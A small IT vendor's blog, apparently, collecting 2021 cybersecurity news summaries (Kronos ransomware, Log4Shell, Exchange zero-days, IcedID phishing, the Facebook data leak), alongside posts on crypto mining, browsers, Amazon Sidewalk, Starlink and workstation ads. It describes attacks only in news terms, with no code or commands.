Kronos HR Management Platform hit by Ransomware

Kronos hit with ransomware, warns of data breach and 'several week' outage

The HR management platform has already informed major customers, like the city government of Cleveland, about the attack.

Krono's software is used by many major corporations and local governments.  Among it's many clients, Tesla, City of Cleveland, hospitals and universities including Clemson, Temple and Winthrop University Hospital.  The clients use Kronos work management software.

The ransomware attack has compromised employee information including names, addresses and social security numbers.

Worst of all is the outage is going to cause many to miss payroll this week.  Not a pleasant thing during the holiday season.

https://www.zdnet.com/article/hr-platform-kronos-brought-down-by-ransomware-attack-ukg-warns-of-data-breach/?ftag=TREc64629f&bhid=%7B%24external_id%7D&mid=%7B%24MESSAGE_ID%7D&cid=%7B%24contact_id%7D&eh=%7B%24CF_emailHash%7D

These researchers wanted to test cloud security. They were shocked by what they found.

Cybersecurity researchers set up a tempting cloud honeypot to examine how cyber attackers work.

Cloud computing has become ubiquitous in business today.  The problem is the same lax password requirements and slack security is being utilized by many of the companies.  Recently cybersecurity experts at Palo Alto Networks set up a honeypot of 320 entry points around the world.  A "honeypot" is similar to a sacrificial lamb and is meant to attract cybercriminals.

The honeypot was designed with weak passwords used default passwords that was shipped from factory, info readily available online.  The honeypot was made up of common remote services, misconfigured to attract malicious actors.

And it wasn't long before cyber criminals discovered the honeypot and looked to exploit it -- some of the sites were compromised in minutes while 80% of the 320 honeypots were compromised within 24 hours. All of them had been compromised within a week. 

"The speed of vulnerability management is usually measured in days or months. The fact that attackers could find and compromise our honeypots in minutes was shocking. This research demonstrates the risk of insecurely exposed services," said Jay Chen, principal cloud security researcher at Palo Alto Networks. 

https://www.zdnet.com/article/these-researchers-wanted-to-test-cloud-security-they-were-shocked-by-what-they-found/

Intel 11th Generation based Workstations by Driving Force

Tech Giants Microsoft, Amazon and Others Warn of Widespread Software Flaw

This new flaw is called Log4Shell and it allows an attacker to gain entry into servers and computer systems without a password.  Within 12 hours of the Log4Shell exploit being found, hackers were already exploiting the vulnerability online.  Cybersecurity researchers say they have seen thousands of attempts to exploit the bug.

Online Gaming sites are being exploited and any Cloud software entity is at risk.  Amazon, Twitter and Cisco Systems are all working to protect users and study the threat against their systems.

Hackers started exploiting the recent flaw early Friday to gain access to servers running Microsoft’s  Minecraft gaming software.  Security experts noticed the flaw being exploited in Minecraft when players utilize chat features.  A few lines of text passed among players can penetrate the defenses of a targeted computer.  The text is part of Log4J and open source java based logging utility.

Soon they observed widespread scanning and attempts to trigger the Log4j bug across the internet. In a note published Friday, Microsoft advised Minecraft users to upgrade their software to patch the bug.

IBM's RedHat and Oracle's VMware are deploying patches.  The flaw allows attackers to convert computer's log files (files that track a computer's activities) into malicious instructions forcing the machine to download software.  Once this has happened an attacker has access to a victim's network.

Be aware that the threat is against all Internet entities and the problem is that each individual enterprise will have to patch their servers and systems.  Some companies have already begun patching systems but this is not a coordinated simultaneous fix so some users will be at risks longer.

Roblox a popular gaming platform was mentioned on the news this a.m.

Massive data breaches have become so common that we’ve gotten numb to reports detailing another hack or 0-day exploit. That doesn’t reduce the risk of such events happening, as the cat-and-mouse game between security experts and hackers continues. As some vulnerabilities get fixed, others pop up requiring attention from product and service providers. The newest one has a name that will not mean anything to most people. They call the hack Log4Shell in security briefings, which doesn’t sound very scary. But the new 0-day attack is so significant that some people see it as the worst internet hack in history.

“The internet’s on fire right now,” Adam Meyers told AP News. “People are scrambling to patch and all kinds of people scrambling to exploit it.”  Meyers is the senior vice president of intelligence at Crowdstrike, a cybersecurity company monitoring the Log4Shell hack. 

https://bgr.com/tech/internet-is-scrambling-to-fix-log4shell-the-worst-hack-in-history/

Because the bug is easy to exploit and attacks hard to block, the Log4j problem could be used by hackers to break into corporate networks for years to come, said Aaron Portnoy, principal scientist with the security firm Randori. “It is one of the most significant vulnerabilities that I’ve seen in a long time,” he said.

https://www.wsj.com/articles/tech-giants-microsoft-amazon-and-others-warn-of-widespread-software-flaw-11639260827?mod=hp_lead_pos10

DForce 11th Generation Intel unlocked Beasts!

Over a Million WordPress sites Hacked and Chip Shortage-Sky High Video cards prices - Crypto Mining

Over a million WordPress sites breached

UPDATED: WordPress site owners hosted by GoDaddy have had their data exposed -- for months.

https://www.zdnet.com/article/over-a-million-godaddy-managed-wordpress-sites-cracked/

and my experience Crypto Mining

Alleged Chip Shortage and how to become a Crypto Millionaire or not.

The chip shortages affecting automobile production and computer pricing has been in the news lately.  We've been told lots of stories about the cause whether it's supply chain issue or pandemic related.  The chips related to auto manufacturing are supposedly low profit margin and the chip makers are not thrilled about gearing up capacity to supply the auto makers.  Ford is building a plant to make their own chips in the future.  Tesla seems to be the only auto manufacturer not affected.  I'm sure Elon Musk had already incorporated chip manufacturing in the company SOP.

Computer chips have steadily crept upward in prices, especially memory.  The computers Driving Force builds are 99% for business and don't require dedicated Graphics cards for business/cloud applications.

I recently built a new monster PC for myself so I could install/test Windows 11.  At the time there were no video cards available so I had to use an older Nvidia 750 ti card.  I thought Gamers were eating up the available supply of video cards causing shortages and steep prices.  I tried searching for video cards with at least 4GB, preferably 6 GB of memory and they are sold out everywhere.. Best Buy for example.  In addition, the price has doubled at least.  In July of 2019, I bought a NVidia 1650/4 GB Ram for $149.99 at Micro Center.

Today the same card will cost you at least $319 at Newegg, up to $390 for the same chipset.

and those are not the most expensive cards either, see below.

As I said above, I thought it was gamers causing the video cards to be scarce and the chip shortage but I was wrong.  If you watch the stock market you know Nvidia and AMD stocks are some of the hottest ones to have.  Both companies make GPUs, Graphic Processing Units and are experiencing no chip shortage.  

The demand behind their products is Crypto Mining.  That's right, GPUs are more efficient at processing crypto transactions (mining) than computer CPUs.  I've a couple of SOL (Solana) mining machines running full time at my office, one is employing the Nvidia 1650 in my main machine and the other miner is a 3rd generation Intel Core i5 processor.  I had my monster AMD Ryzen 9 mining but the strain mining placed on the CPU was too high.  It affected performance significantly as well as generated a lot of heat from the processor.  I didn't want to risk the investment in my new AMD Ryzen 9 Windows 11 machine, mining is not lucrative enough with my present setup.

However, with the right video cards and enough of them one could make a lot of money mining.  That is why so many countries and even towns in certain US states have outlawed crypto mining.

As of today  12/3/21 at 6:30 a.m. EST, since 11/29/21 11:45 a.m.  I have mined almost $2 ($1.85 to be exact) of Solana, LOL.

There has been some down time.  My initial rig was my AMD machine,  I took it offline and established my main computer with the Nvidia 1650 as a miner.  (BTW, since I don't game I don't see much performance degradation using the GPU rather than the CPU), and yesterday I added a second miner using the old Intel Core i5 computer that plods along in another room happily mining.

So there you have it.  Why there is a chip shortage, 

1. Chip manufacturers want to build GPUs, not low profit margin auto chips (now even Intel is developing a graphics chip).
2. GPUs in high demand by Crypto miners.

and that's my story, I'm sticking to it.

I will follow up with another article soon about my mining software and how to build your own mining rig. Also hopefully an update on extreme earnings if I can acquire the right video (GPU) card.  I want to try an ETH Ethereum miner, BTW, Solana which is currently at $236/coin is an Ethereum based alt coin.

Machine Performance suffering, try closing Chrome. Apples and PCs.

I have advised my clients for a year now to try the newest version of Microsoft Edge over Google's Chrome.  Microsoft has rewritten the Edge Browser using the same language, Chromium as the Chrome browser is written in.  This allows Edge to make use of the extensive library of extensions that have been written for Chrome.

There are more compelling reasons to use Edge or some other browser rather than Chrome.  At times my desktop computer's performance became sluggish to the point of "not responding".  What I have found is if I close Chrome the computer's performance returns.  I have multiple displays (3) and run multiple browsers, chiefly Edge, Chrome and Mozilla Firefox.  Recently I have installed the Brave browser and cut my use of Chrome.

I am writing this blog using Chrome (BlogSpot is Google's free blog), and when I check my system resources in use I find that Chrome is using more resources than Edge even though I only have 3 tabs open compared 9 tabs in Edge that are monitoring streaming data from various sites, see below.

Chrome has become bloated and now suffers the same performance issues as Microsoft's old Internet Explorer which killed Netscape and became the browser of choice in the 90's.

Microsoft's Edge is leaner and has released new features such as Vertical Tabs which I love on a widescreen monitor.

ZDNet has recently addressed Chrome's performance woes.  Below are several links that should help you evaluate you own situation.

As always, thanks for reading.  I hope you find it informative.  Also, this issue applies to Apple computers as well as PC as mentioned in the first article.

Dumping Google Chrome? Here's the best browser to replace it

It seems that to quite a few of you, the idea of dumping Google Chrome for a browser -- even if that browser is better -- is like pulling wisdom teeth. Despite the fact that it's a bottomless pit when it comes to eating system resources and has become the bloated browser it was initially meant to replace, people love it.

https://www.zdnet.com/article/dumping-google-chrome-heres-the-best-browser-to-replace-it/

Ditching Google Chrome was the best thing I did this year (and you should too)

It was about a year ago that I began my transition away from Google Chrome (spoilers, I still need to use it, but I now use it minimally).

I disentangled my data and passwords out of the browser.  I tried a whole bunch of other browsers.  I learned and relearned a whole bunch of new muscle memory movements.

It was hard.  But it was worth it.

https://www.zdnet.com/article/ditching-google-chrome-was-the-best-thing-i-did-this-year-and-you-should-do-the-same-too/

Bye-bye, Chrome: 10 steps to help you switch to Microsoft's new Edge browser

If you've been looking for an option to dump Google's Chrome browser, consider Microsoft's new Edge browser, which delivers much of the same experience you get from Chrome, with a few features that are downright superior. Here's how to get started.

https://www.zdnet.com/article/bye-bye-google-chrome-10-steps-to-help-you-switch-to-the-new-edge-browser/

DForce Workstations - Windows 11 is now available on fast, reliable DForce Workstations 

DForce workstations feature matched Processors, Mainboards and SSDs to allow you to maximize performance.  Don't make the consumer based 6 month mistake, fast now, slow later.

June 8th: Amazon Sidewalk set to automatically share your internet with neighbors.

WHAT COULD POSSIBLY GO WRONG? —

Amazon devices will soon automatically share your Internet with neighbors.  Amazon's experiment wireless mesh networking turns users into guinea pigs.

If you have an Amazon Echo Dot, Show or any other Alexa activated device, you have less than a week to opt out of having your internet bandwidth automatically shared by Amazon in a huge mesh network.

On June 8th, unless you opt out by changing your default settings on your Amazon devices; The program known as "Amazon Sidewalk" will share your internet connectivity with those who do not have internet as well as allowing you onto your neighbor's connection.

From the Amazon Sidewalk webpage:

Amazon Sidewalk is a shared network that helps devices like Amazon Echo devices, Ring Security Cams, outdoor lights, motion sensors, and Tile trackers work better at home and beyond the front door. When enabled, Sidewalk can unlock unique benefits for your device, support other Sidewalk devices in your community, and even locate pets or lost items.

The benefits of Amazon Sidewalk

Amazon Sidewalk creates a low-bandwidth network with the help of Sidewalk Bridge devices including select Echo

and Ring devices. These Bridge devices share a small portion of your internet bandwidth which is pooled together to

provide these services to you and your neighbors. And when more neighbors participate, the network becomes even

stronger.

Devices in the program include not only Amazon's Echo dots and other smart speakers but Ring doorbells, security cams, Tile Trackers as well as others.

Amazon cites the amount to be shared will be 1/40th of your bandwidth, (80kbps typical internet connection) and will cap the amount of shared bandwidth at 500 MB (megabytes)/month.

Considering that few users ever look at or know how to access the default settings of their devices, expect nearly full coverage.

Amazon has published a white paper detailing the technical underpinnings and service terms that it says will protect the privacy and security of this bold undertaking. To be fair, the paper is fairly comprehensive, and so far no one has pointed out specific flaws that undermine the encryption or other safeguards being put in place. But there are enough theoretical risks to give users pause.

TO read more, click on the following links;

https://arstechnica.com/gadgets/2021/05/amazon-devices-will-soon-automatically-share-your-internet-with-neighbors/

Amazon's Sidewalk Project

Amazon White Paper

SolarWinds hackers are at it again, targeting 150 organizations, Microsoft warns

SolarWinds hackers are at it again, targeting 150 organizations, Microsoft warns

Microsoft has reported that the same group responsible for the SolarWinds attack "Nobellum" are at it again, this time distributing intrusion software via email purporting to be from USAID, US Aid organization.

This time they have compromised email systems linked to the State Department’s International aid agency to send spear phishing emails targeting agencies and individuals who have been identified as anti-Putin.  It is using a message purporting to be from former President Trump with a bait link about election fraud.

If clicked the link delivers malicious files to compromise your system.  

It is reported that the targets are agencies and individuals who are anti-Putin.  The email has a headline that proclaims, (see picture below, courtesy NY Times);

The hackers are linked to Russia's main intelligence agency and the emails are being sent via the email system used by the State Department's international aid agency.

Hackers linked to Russia’s main intelligence agency surreptitiously seized an email system used by the State Department’s international aid agency to burrow into the computer networks of human rights groups and other organizations of the sort that have been critical of President Vladimir V. Putin, Microsoft Corporation disclosed on Thursday.

To read more please visit the links below;

https://www.nytimes.com/2021/05/28/us/politics/russia-hack-usaid.html

https://www.nbcnews.com/tech/security/solarwinds-hackers-are-it-again-targeting-150-organizations-microsoft-warns-n1268893

If you don't have protection, please consider doing something,

https://www.malwarebytes.com/pricing/

Ransomware Attacks. Take advantage of all layers of protections afforded you.

Turn on anti-ransomware feature in Windows 10.

In light of the most recent high profile ransomware attack on the Colonial pipeline, what can you do to protect your organization from falling victim to a ransomware attack?

According to Firewall manufacturer SonicWall, Ransomware threats increased a massive 62 percent in 2020 compared to 2019 and it is showing no sign of slowing down.  How many attacks?... over 304 million ransomware attacks in 2020 with the average payout over $220,000.

Of course, those are mainly businesses forking over that kind of money to attackers who are holding their data hostage. Small businesses in particular are disproportionately targeted, but facilitators of ransomware do also go after individuals.

One may think that if they can hack through the protection manned by large corporations what can I do?  The large corporations have deep pockets that make them lucrative targets.  However as stated above, individuals are targeted as well.

Windows 10 as well as most Security software firms have protections that provide extra layers of security but you must enable or properly configure them to work effectively.

You should routinely back up any important data, and as always, following smart computing habits (like not clicking on links in unsolicited emails) to tip the odds in your favor.

Read about steps you can take below if you are running Windows 10 and if you own Kaspersky security software.

Criminals spread malware using website contact forms with Google URLs

 Criminals spread malware using website contact forms with Google URLs

Crooks are using social engineering to exploit workers' efforts to do their jobs.

If you are using a contact form on your company website please be aware that criminals are now using website contact forms to spread an info-stealing Trojan called IcedID.  The ploy the crooks are using is to include legitimate Google URLs, and then requiring users to supply their Google username and password.

IcedID is a banking trojan and information stealer and can be used as an entry point for subsequent attacks, such as manually operated ransomware for high-value targets. Human-operated ransomware attacks are increasingly common and require the attacker to sit at the keyboard and orchestrate the attack, in contrast to an automated attack.

In recent weeks, one of my clients experienced a rise in spam and phishing emails from their WordPress based website.  They implemented a CAPTCHA challenge to thwart the phishing and scam emails, however this new threat has the ability to bypass the CAPTCHA protection.

Microsoft considered the threat serious enough to report the attacks to Google's security teams to warn them that cyber criminals are using legitimate Google URLs to deliver malware. The Google URLs are useful to the attackers because they will bypass email security filters. The attackers appear to have also bypassed CAPTCHA challenges that are used to test whether the contact submission is from a human. 

The crooks are using social engineering to exploit workers' efforts to do their jobs, using language that applies pressure on the employee to respond.

One trick used is to falsely claim that the website is using copyrighted images.  We have already experienced this at one client.

This is an old ploy however with a new twist.  The email contains a link to a sites.google.com page.  If the link is followed a ZIP file containing a JavaScript file will automatically download and it in turn downloads the IcedID malware as a .DAT file.  A remote control component Cobalt Strike is installed as well which allows the attacker to control the device over the internet.

To read the full article at ZDNet click on the following link;

Criminals spread malware using website contact forms with Google URLs | ZDNet

Facebook Data Breach exposes 533 million users data on Dark Web, Elon Musk's StarLink satellite internet coming soon to an area near you.

Facebook data on 533 million users posted online

Data of 533 million Facebook users including phone numbers, Facebook IDs, full names, birth dates and other information have been posted online.

Of the 533 million users whose data was leaked, 32.3 million US users and 11.5 million in the UK are affected.

The data was posted on a Dark Web site for free.  User information posted included; 

"The information that was exposed includes profile information, Facebook identification numbers, emails, location data and more, according to a report in The Record, which is published by cyber-threat intelligence firm Recorded Future."

Facebook has reported that the information collected was done in 2019 and they have since found and patched the issue.  However as reported on ZDNet news, how many users have changed their associated email and phone numbers since 2019?... not many.  Fortunately, SSNs are not required on Facebook and credit card info is hopefully outdated by now.

This "regurgitation" of an old, massive hack shows how vulnerable data can be once it's stolen.

On the Dark Web there is a massive market for buying and selling personal information  You can expect this data to be used in future phishing and hack attacks.

For more info read;

https://www.zdnet.com/article/facebook-data-on-533-million-users-posted-online/?ftag=TRE-03-10aaa6b&bhid=2219791&mid=13323985&cid=716603217

https://www.thestreet.com/latest-news/facebook-data-for-half-billion-users-emerge-on-dark-web

How to Check if Your Phone Number Is in the Huge Facebook Data Leak

https://gizmodo.com/how-to-check-if-your-phone-number-is-in-the-huge-facebo-1846617849

Starlink - Internet alternative

The Starlink satellite communications network moves closer to being a viable alternative as an internet provider replacement with each launch of SpaceX.  On each SpaceX mission, up to 60 satellites are being launched.  Starlink currently has 1321 in orbit with 12,000 more already approved and 30,000 more licenses applied for but not yet approved.

Elon Musk is accomplishing his goal at a cost much less than conventional satellites and Starlink's satellites are located in an orbit 60 times closer than conventional satellites.

I have signed up for the service which is expected to be available in mid to late 2021.  It costs an initial $99.00 and will be available on a first come, first serve basis.

When signing up I had to find my location Plus Code which was something new to me.  Plus Codes are based on latitude and longitude, and displayed as numbers and letters. With a Plus Code, people can receive deliveries, access emergency and social services, or just help other people find them.  I have included a link to find your plus code below.

To read more;

With Starlink, Elon Musk Is Once Again Showing How To Make Economies Of Scale Work (forbes.com)

https://www.upi.com/News_Photos/view/upi/9561217701bca2fdc4eb07d2bceca2f6/SpaceX-Launches-Starlink-Satellites-From-the-Cape-Canaveral-Space-Force-Station-Florida/

https://maps.google.com/pluscodes/

Starlink

Shameful Plug DForce Intel based Workstations

SSD equipped, Generation 9, 10 and 11

PDF - View or Download

Microsoft Exchange zero-day attacks: 30,000 servers hit already, says report

Some clients have reported an increase of junk/spam emails in the last week.  If your organization still uses an onsite Exchange server then you need to be aware that it needs to be patched now or taken offline.

the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) has issued an order to agencies to apply the patches for on-premise Exchange systems or to simply disconnect vulnerable servers after seeing "active exploitation" of the vulnerabilities. In other words, patch now or cut off a vital communications tool. 

So far 4 previously unknown vulnerabilities are being used in attacks against thousands of companies, perhaps tens of thousands organizations.

Microsoft released patches for a critical flaw last year and warned Exchange users to update their servers but said that months later tens of thousands of server remain unpatched despite attacks from nation-state hackers.

This latest attack is being carried out by a previously unknown group called Hafnium who the Department of Homeland Security's (CISA) Cybersecurity and Infrastructure Agency thinks is based in China.

The Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches.

CISA's former directory thinks government agencies and small businesses will be more affected by these attacks than large enterprise. 

To read the full article please click on the following link;

https://www.zdnet.com/article/microsoft-exchange-zero-day-attacks-30000-servers-hit-already-says-report/?ftag=TRE-03-10aaa6b&bhid=2219791&mid=13291744&cid=716603217

If you haven't already seen an increase in spam activity, expect to and be careful that you don't open up your systems to an attack.  The following article details the most common ploys used to distribute malware and attacks.

Phishing: These are the most common techniques used to attack your PC

Microsoft Office macros, PowerShell and more are still proving to be popular with cyber criminals distributing attacks via phishing emails, warn researchers after analysing billions of attacks.

https://www.zdnet.com/article/phishing-these-are-the-most-common-techniques-used-to-attack-your-pc/

and it's not just  PCs being attacked.

30,000 Macs infected with new Silver Sparrow malware

Silver Sparrow can even run on systems with Apple's new M1 chip.

"According to data provided by Malwarebytes, Silver Sparrow had infected 29,139 macOS endpoints across 153 countries as of February 17, including high volumes of detection in the United States, the United Kingdom, Canada, France, and Germany," 

https://www.zdnet.com/article/30000-macs-infected-with-new-silver-sparrow-malware/